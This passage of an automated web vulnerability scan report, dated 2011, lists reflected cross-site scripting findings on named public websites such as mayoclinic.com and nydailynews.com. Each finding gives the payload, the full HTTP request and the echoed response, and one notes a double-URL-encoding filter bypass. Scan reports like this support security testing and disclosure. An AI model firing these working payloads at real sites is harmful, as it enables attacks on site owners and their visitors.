This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4257a"-alert(1)-"d960cce6c75 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marthastewart.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Last-Modified: Sat, 02 Apr 2011 13:34:25 +0000
ETag: "1301751265"
Content-Type: text/html; charset=utf-8
X-Ttl: 14400.000
ntCoent-Length: 21362
X-Varnish: 1769286479
X-Req-Grace: 20.000
Cache-Control: private, max-age=0
Expires: Sat, 02 Apr 2011 13:34:26 GMT
Date: Sat, 02 Apr 2011 13:34:26 GMT
Content-Length: 21362
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
mniturePageName="page not found";
s.server="www.marthastewart.com";
s.pageType="";
s.prop1="";
s.prop3="";
s.prop4="channel";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop12="http://www.marthastewart.com/4257a"-alert(1)-"d960cce6c75";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop17="";
s.prop18="";
s.prop19="";
s.prop20="";
s.prop21="";
s.prop22="";
s.prop23="";
s.prop24="";
s.prop25="";
s.prop26="";
s.prop27="logged
...[SNIP]...

6.65. http://www.mayoclinic.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0c3e%2527%253balert%25281%2529%252f%252f0eb65c39a2 was submitted in the REST URL parameter 1. This input was echoed as e0c3e';alert(1)//0eb65c39a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.icoe0c3e%2527%253balert%25281%2529%252f%252f0eb65c39a2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:26:15 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=6783630;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:26:15 GMT;path=/
Set-Cookie: CFTOKEN=43948287;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:26:15 GMT;path=/
Set-Cookie: JSESSIONID=c230d0ddc76e41291cab3c2c7e2138772567;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
';
   OAS_listpos = 'Bottom,Position4';
   OAS_query = 'E1ED5C92-F149-7785-66979D84200611F0=ObjectID&E1ED5C92-F149-7785-66979D84200611F0=pl&mcPage=type&404=ID&1?404;http://www.mayoclinic.com:80/favicon.icoe0c3e';alert(1)//0eb65c39a2=B404';
   OAS_target = '_top';
   //end of configuration
   OAS_version = 10;
   OAS_rn = '001234567890'; OAS_rns = '1234567890';
   OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
   fun
...[SNIP]...

6.66. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4174f'%3balert(1)//b235c779868 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4174f';alert(1)//b235c779868 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?4174f'%3balert(1)//b235c779868=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:25:41 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=56390739;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:41 GMT;path=/
Set-Cookie: CFTOKEN=78178525;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:41 GMT;path=/
Set-Cookie: JSESSIONID=8030c0b06e9348c9e386246d2c3415127262;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
;
   OAS_listpos = 'Bottom,Position4';
   OAS_query = 'E1ED5C92-F149-7785-66979D84200611F0=ObjectID&E1ED5C92-F149-7785-66979D84200611F0=pl&mcPage=type&404=ID&1?404;http://www.mayoclinic.com:80/favicon.ico?4174f';alert(1)//b235c779868=1=B404';
   OAS_target = '_top';
   //end of configuration
   OAS_version = 10;
   OAS_rn = '001234567890'; OAS_rns = '1234567890';
   OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
   f
...[SNIP]...

6.67. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 506b0"-alert(1)-"3c6201fb7ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?506b0"-alert(1)-"3c6201fb7ef=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:25:40 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: CFID=21707428;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:40 GMT;path=/
Set-Cookie: CFTOKEN=48294501;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:25:40 GMT;path=/
Set-Cookie: JSESSIONID=f4308d3d1a40fd31ab3b9122d75b4ba1b687;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
<script>
COMSCORE.beacon({
c1:2,
c2:"6035818",
c3:"6035818",
c4:"http://www.mayoclinic.com/invoke.cfm?b404=1?404;http://www.mayoclinic.com:80/favicon.ico?506b0"-alert(1)-"3c6201fb7ef=1",
c5:"",
c6:"",
c15:""
});
</script>
...[SNIP]...

6.68. http://www.mediaite.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediaite.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f883"><script>alert(1)</script>a6bf2b66203 was submitted in the REST URL parameter 1. This input was echoed as 3f883\"><script>alert(1)</script>a6bf2b66203 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3f883"><script>alert(1)</script>a6bf2b66203 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mediaite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:18:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Cookie
Set-Cookie: PHPSESSID=3qrq02pgj5elgfbk68038olr35; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.mediaite.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:18:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="ht
...[SNIP]...
<form method="post" action="http://www.mediaite.com/favicon.ico3f883\"><script>alert(1)</script>a6bf2b66203/?_login=25c119c94d">
...[SNIP]...

6.69. http://www.motime.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6b98"><script>alert(1)</script>c2b107df494 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob6b98"><script>alert(1)</script>c2b107df494 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Sat, 02 Apr 2011 13:58:08 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.12-pl0-gentoo
Edge-control: bypass-cache=on
Set-Cookie: trkdada=x3UsGU2XK3CFuGIzAy+8Ag==; expires=Sun, 01-Apr-12 13:58:08 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Content-Length: 34371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="returnurl" value="/favicon.icob6b98"><script>alert(1)</script>c2b107df494" />
...[SNIP]...

6.70. http://www.motime.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34891</script><script>alert(1)</script>e1ff6838de9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico34891</script><script>alert(1)</script>e1ff6838de9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.motime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Sat, 02 Apr 2011 13:58:22 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.12-pl0-gentoo
Edge-control: bypass-cache=on
Set-Cookie: trkdada=x3UsK02XK35zo0P8Azz5Ag==; expires=Sun, 01-Apr-12 13:58:22 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
Content-Length: 34334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript">
_dadanet.registerStartup(
['classes/FormManager', 'classes/CommObjects'],
function()
{
var co_opts = {


uri: 'http://www.motime.com/favicon.ico34891</script><script>alert(1)</script>e1ff6838de9',
dict:{
'op_in_progress_desc': '',
'is_friend': 'We are friends',
'invite_already_send': 'Invite already sent',
'invite_send': 'Invitation sent',
'invite_blocked': 'Invites blocked by user',
'is_fan'
...[SNIP]...

6.71. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cb45a<script>alert(1)</script>f364086cc64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocb45a<script>alert(1)</script>f364086cc64 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mp3raid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:07:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 5934
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><TITLE>404 Page Not Fou
...[SNIP]...
<h1>The page /favicon.icocb45a<script>alert(1)</script>f364086cc64 not found!</h1>
...[SNIP]...

6.72. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcd99"><script>alert(1)</script>c02e519161c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icodcd99"><script>alert(1)</script>c02e519161c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mp3raid.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:07:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Content-Length: 5940
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><TITLE>404 Page Not Fou
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php?v=250&pub=burkul" onmouseover="return addthis_open(this, '', 'http://www.mp3raid.com/favicon.icodcd99"><script>alert(1)</script>c02e519161c', '404 Page Not Found')" onmouseout="addthis_close()" onclick="return addthis_sendto()">
...[SNIP]...

6.73. http://www.mycricket.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycricket.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8634e</script><script>alert(1)</script>11bc3873d9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico8634e</script><script>alert(1)</script>11bc3873d9a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mycricket.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:42:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14-pl0-gentoo
Set-Cookie: mycricket_rdi=ee713ae5dfb322af6abdeece0ada1b4e; path=/
Content-Type: text/html; charset=utf-8
Content-Length: 30848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
    <title>invalid page | Cricke
...[SNIP]...
pe="text/javascript">
var hbx=new Object();hbx.vpc="HBX0150.02e";hbx.gn="ehg-reddoor.hitbox.com";

//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
hbx.acct="DM560614E2RE94EN3";
hbx.mlc="/favicon.ico8634e</script><script>alert(1)</script>11bc3873d9a"; //multi-level content category

//alert('tmpl: hbx_page_code_for_error_pages');

try{
eval ('data = ' + $.cookie('data'));
var hbxCommerceVars={};
hbxCommerceVars.pv="0"; //product
...[SNIP]...

6.74. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mylifetime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 255ec'%3b8d549cf0020 was submitted in the REST URL parameter 1. This input was echoed as 255ec';8d549cf0020 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /255ec'%3b8d549cf0020 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylifetime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 02 Apr 2011 13:36:40 GMT
X-Pingback: http://www.mylifetime.com/xmlrpc.php
X-Lt-Cache: CACHE_PAGE_set
X-Lt-Cache-key: http://www.mylifetime.com/255ec'%3b8d549cf0020
RealServer: prodweb4
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 13:36:42 GMT
Date: Sat, 02 Apr 2011 13:36:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<script type="text/javascript">refresh_rate = 1;
hbx_ad_refresh_page = 'index';
hbx_ad_refresh_apath = '_255ec';8d549cf0020';</script>
...[SNIP]...

6.75. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mylifetime.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 175d9"><a>3ddeb7ae6ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /175d9"><a>3ddeb7ae6ca HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylifetime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sat, 02 Apr 2011 13:35:32 GMT
X-Pingback: http://www.mylifetime.com/xmlrpc.php
X-Lt-Cache: CACHE_PAGE_set
X-Lt-Cache-key: http://www.mylifetime.com/175d9"><a>3ddeb7ae6ca
Realserver: prodweb12
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 13:35:35 GMT
Date: Sat, 02 Apr 2011 13:35:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<img src="http://pixel.quantserve.com/pixel/p-84eTroxoNX3JE.gif?labels=MYLT:175d9"><a>3ddeb7ae6ca" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
...[SNIP]...

6.76. http://www.nydailynews.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3df4'%3balert(1)//2457915afd7 was submitted in the REST URL parameter 1. This input was echoed as c3df4';alert(1)//2457915afd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc3df4'%3balert(1)//2457915afd7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nydailynews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:24:42 GMT
Server: Apache
Keep-Alive: timeout=3, max=998
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 71163
Set-Cookie: sto-id-sg-web-8080=BOACAKAK; Expires=Sat, 02-Apr-2011 02:24:23 GMT; Path=/

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/favicon.icoc3df4';alert(1)//2457915afd7';
}
//-->
...[SNIP]...

6.77. http://www.oodle.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dee3e"-alert(1)-"d0aa2d773ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icodee3e"-alert(1)-"d0aa2d773ae HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oodle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:36:48 GMT
Content-Length: 23641
Connection: close
Set-Cookie: otu=f0124679080472be32101e034bba68c0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=c3f05fa9a6a425c696068891ef99e4ef; path=/; domain=.oodle.com
Set-Cookie: a=dT1EMkY4MTExRTREOTcyNjcw; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
-_--_--_-";
odl.reporting.replyExtraFields = "usa-_-nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds favicon.icodee3e"-alert(1)-"d0aa2d773ae","10000000","usa-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

6.78. http://www.oodle.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141c5"><script>alert(1)</script>d6b037b25fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico141c5"><script>alert(1)</script>d6b037b25fc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oodle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:36:47 GMT
Content-Length: 23718
Connection: close
Set-Cookie: otu=4d4e452f05e3458af8c7091581577bcf; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=f396da894437be11c53e9aafdb5d3381; path=/; domain=.oodle.com
Set-Cookie: a=dT1BNUUwMDhCMDREOTcyNjZG; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/favicon.ico141c5"><script>alert(1)</script>d6b037b25fc" />
...[SNIP]...

6.79. http://www.pronto.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pronto.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c04d7'><script>alert(1)</script>f4fdd867ae0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc04d7'><script>alert(1)</script>f4fdd867ae0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pronto.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:24:39 GMT
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 90396


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

...[SNIP]...
<meta content='http://www.pronto.com/favicon.icoc04d7'><script>alert(1)</script>f4fdd867ae0' property='og:url'/>
...[SNIP]...

6.80. http://www.rent.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rent.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee0cd'%3bcb0a88443c6 was submitted in the REST URL parameter 1. This input was echoed as ee0cd';cb0a88443c6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icoee0cd'%3bcb0a88443c6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rent.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:36:01 GMT
Server: Apache
